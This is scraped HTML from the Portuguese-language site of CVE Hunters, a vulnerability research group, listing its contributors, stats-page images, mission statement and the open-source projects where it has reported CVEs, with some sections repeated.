width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/yago-dyogennes/">Yago<br>Dyogennes</a></td> </tr> </tbody> </table> <h2 id="repositório">Repositório </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/CVE-Hunters/cve-hunters"> <img src="/team/cve-hunters-logo.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://github.com/CVE-Hunters/cve-hunters">Repositório<br>Oficial</a></td> </tr> </tbody> </table><p>Você pode encontrar links úteis para repositórios e colaboradores abaixo:</p> <h2 id="fundador">Fundador </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/nmmorette/"> <img src="/assets/contributors/natan.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/nmmorette/">Natan Maia<br /> Morette</a></td> </tr> </tbody> </table> <h2 id="colaboradores">Colaboradores </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/angelo-morette-019/"> <img src="/assets/contributors/angelo.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/diegocbcastro/"> <img src="/assets/contributors/diego.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/elisangelasilvademendonca/"> <img src="/assets/contributors/elisangela.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/angelo-morette-019/">Angelo<br />Morette</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/diegocbcastro/">Diego<br />Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/elisangelasilvademendonca/">Elisângela<br />Mendonça</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/f%C3%AAmartins/"> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/"> <img src="/assets/contributors/isadora.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/itauan"> <img src="/assets/contributors/itauan.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/f%C3%AAmartins/">Fernanda<br />Martins</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/">Isadora<br />Novaes</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/itauan">Itauan<br />Santos</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/karina-gante/"> <img src="/assets/contributors/karina.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/marceloqueirozjr"> <img src="/assets/contributors/marcelo.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/marcos-tolosa/"> <img src="/assets/contributors/marcos.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/karina-gante/">Karina<br />Gante</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/marceloqueirozjr">Marcelo<br />Queiroz</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/marcos-tolosa/">Marcos<br />Tolosa</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app"> <img src="/assets/contributors/pedro.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/rafael-corvino/"> <img src="/assets/contributors/rafael.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/"> <img src="/assets/contributors/raul.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app">Pedro<br />Lyrio</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/rafael-corvino/">Rafael<br />Corvino</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/">Raul<br />Pazemécxas</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app"> <img src="/assets/contributors/samara.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira"> <img src="/assets/contributors/taiza.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://br.linkedin.com/in/thiagoescarrone"> <img src="/assets/contributors/thiago.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app">Samara<br />Gama</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira">Taíza<br />Oliveira</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://br.linkedin.com/in/thiagoescarrone">Thiago<br />Escarrone</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vanderlei-princival/"> <img src="/assets/contributors/vanderlei.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/vinicius-gross-castro"> <img src="/assets/contributors/viniciusCastro.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/"> <img src="/assets/contributors/vinicius.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vanderlei-princival/">Vanderlei<br />Princival</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/vinicius-gross-castro">Vinicius<br />Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/">Vinícius<br />Melfi</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/yago-dyogennes/"> <img src="/assets/contributors/yago.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/yago-dyogennes/">Yago<br />Dyogennes</a></td> </tr> </tbody> </table> <h2 id="repositório">Repositório </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/CVE-Hunters/cve-hunters"> <img src="/team/cve-hunters-logo.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://github.com/CVE-Hunters/cve-hunters">Repositório<br />Oficial</a></td> </tr> </tbody> </table> Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/pt/stats/ https://www.cvehunters.com/pt/stats/ <p>Todas as estatísticas de CVEs registradas pela equipe do CVE-Hunters:</p> <h3 id="total-de-cves-registrados">Total de CVEs registrados </h3><img src="/stats/totalCVEsRegistred.png" width=100% height=100> <h3 id="quem-mais-encontrou-cves">Quem mais encontrou CVEs </h3><img src="/stats/topFinderss.png" width=100% height=100> <h3 id="tipos-de-vulnerabilidades">Tipos de vulnerabilidades </h3><img src="/stats/vulnerabilityType.png" width=100% height=100> <h3 id="severidade">Severidade </h3><img src="/stats/severity.png" width=100% height=100> <h3 id="histórico-de-estrelas-do-repositório">Histórico de Estrelas do Repositório </h3><img src="https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&type=Date" width=100% height=100><p>Todas as estatísticas de CVEs registradas pela equipe do CVE-Hunters:</p> <h3 id="total-de-cves-registrados">Total de CVEs registrados </h3><img src="/stats/totalCVEsRegistred.png" width=100% height=100 /> <h3 id="quem-mais-encontrou-cves">Quem mais encontrou CVEs </h3><img src="/stats/topFinderss.png" width=100% height=100 /> <h3 id="tipos-de-vulnerabilidades">Tipos de vulnerabilidades </h3><img src="/stats/vulnerabilityType.png" width=100% height=100 /> <h3 id="severidade">Severidade </h3><img src="/stats/severity.png" width=100% height=100 /> <h3 id="histórico-de-estrelas-do-repositório">Histórico de Estrelas do Repositório </h3><img src="https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&type=Date" width=100% height=100 /> Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/pt/search/ https://www.cvehunters.com/pt/search/ Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/pt/about/ https://www.cvehunters.com/pt/about/ <div align="center" width=100% > <h1 id="cve-hunters">CVE Hunters </h1><blockquote> <p><em><strong>Grupo de Pesquisa em Vulnerabilidade 🔎</strong></em></p> </blockquote> <a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"> <p><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"><img src="https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab" /></a></p> <h2 id=""> </h2><div align="justify"> <h3>Nossa Missão 🚀</h3> <p><img src="https://img.shields.io/badge/I-6407ab" /> Identificar e documentar vulnerabilidades em projetos de código aberto amplamente utilizados pela comunidade, contribuindo para a melhoria contínua de sua postura de segurança da informação; </p> <p><img src="https://img.shields.io/badge/II-6407ab" /> Promover a formação prática de novos profissionais na área de segurança da informação, proporcionando aos alunos experiência prática e realista nos processos de identificação, relato e remediação de vulnerabilidades; </p><div align="center" width=100% > <h1 id="cve-hunters">CVE Hunters </h1><blockquote> <p><em><strong>Grupo de Pesquisa em Vulnerabilidade 🔎</strong></em></p> </blockquote> <a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"> <p><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"><img src="https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab" / /></a></p> <h2 id=""> </h2><div align="justify"> <h3>Nossa Missão 🚀</h3> <p><img src="https://img.shields.io/badge/I-6407ab" / /> Identificar e documentar vulnerabilidades em projetos de código aberto amplamente utilizados pela comunidade, contribuindo para a melhoria contínua de sua postura de segurança da informação; </p> <p><img src="https://img.shields.io/badge/II-6407ab" / /> Promover a formação prática de novos profissionais na área de segurança da informação, proporcionando aos alunos experiência prática e realista nos processos de identificação, relato e remediação de vulnerabilidades; </p> <p><img src="https://img.shields.io/badge/III-6407ab" / /> Promover a colaboração na área de segurança da informação, incentivando outros pesquisadores a contribuírem para a publicação de CVEs, aumentando assim a visibilidade dos projetos e mitigando os riscos de segurança cibernética. </p> <h3 id="projetos-contribuídos">Projetos Contribuídos </h3><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/LabRedesCefetRJ/WeGIA"> <img src="/about/wegia.png" width="100"/ /> </br> <b>WeGIA</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/portabilis/i-educar"> <img src="/about/i-educar.png" width="100"/ /> </br> <b>i-Educar</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/portabilis/i-diario"> <img src="/about/i-diario.png" width="100"/ /> </br> <b>i-Diário</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://uxwing.com/wp-content/themes/uxwing/download/brands-and-social-media/ruby-programming-language-icon.png" width="20"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 92</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 81</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 14</b></td> </tr> </tbody> </table> <br/ /> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.sourcecodester.com/"> <img src="/about/sourcecodester.png" width="100"/ /> </br> <b>SourceCodester</b> </a> </td> <td style="text-align: center;"> <a href="https://www.mercusys.com.br/"> <img src="/about/mercusys.png" width="100"/ /> </br> <b>Mercusys</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/SCADA-LTS/Scada-LTS"> <img src="/about/scada-lts.png" width="100"/ /> </br> <b>SCADA-LTS</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://cdn-icons-png.flaticon.com/512/9694/9694712.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://cdn-icons-png.flaticon.com/512/226/226777.png" width="35"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 3</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 2</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 13</b></td> </tr> </tbody> </table> <br/ /> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/centreon/centreon"> <img src="/about/centreon.png" width="100"/ /> </br> <b>Centreon</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/getgrav/grav"> <img src="/about/grav.png" width="100"/ /> </br> <b>Grav</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/indico/indico"> <img src="/about/indico.png" width="100"/ /> </br> <b>Indico</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://cdn.iconscout.com/icon/free/png-256/free-python-logo-icon-download-in-svg-png-gif-file-formats--technology-social-media-vol-5-pack-logos-icons-3030224.png?f=webp" width="28"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 12</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 6</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 1</b></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/mautic/mautic"> <img src="/about/mautic.png" width="100"/ /> </br> <b>Mautic</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/novosga/novosga"> <img src="/about/NovoSGA.png" width="100"/ /> </br> <b>NovoSGA</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/librenms/librenms"> <img src="/about/LibreNMS.png" width="100"/ /> </br> <b>LibreNMS</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 1</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 2</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 3</b></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/projeto-siga/siga"> <img src="/about/siga.png" width="100"/ /> </br> <b>SIGA</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://cdn-icons-png.flaticon.com/512/226/226777.png" width="35"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 1</b></td> </tr> </tbody> </table> Mon, 01 Jan 0001 00:00:00 +0000